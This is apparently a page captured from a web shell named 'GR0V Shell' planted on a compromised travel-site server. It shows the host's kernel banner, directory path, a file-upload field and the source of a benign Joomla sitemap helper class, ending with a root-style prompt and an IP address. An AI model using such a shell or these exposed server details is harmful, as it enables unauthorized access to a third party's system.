? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/administrator/components/com_sitemap/helpers/
File Upload :
Current File : /home/admin/public_html/old/administrator/components/com_sitemap/helpers/helper.php

<?php

/**
* Qlue Sitemap
*
* @author Jon Boutell
* @package QMap
* @license GNU/GPL
* @version 1.0
*
* This component gathers information from various Joomla Components and 
* compiles them into a sitemap, supporting both an HTML view and an XML 
* format for search engines.
*
*/

defined('_JEXEC') or die('Restricted Access');

JLoader::import('joomla.base.object');

class SitemapHelper {
	public static function getActions() {
		$user = JFactory::getUser();

		$result = new JObject();

		$actions = array('core.admin', 'core.manage', 'core.create', 'core.edit', 'core.edit.state', 'core.delete');

		foreach ($actions as $action) {
			$result->set($action, $user->authorise($action, 'com_sitemap'));
		}

		return $result;

	}
}

?>

T1KUS90T
  root-grov@210.1.60.28:~$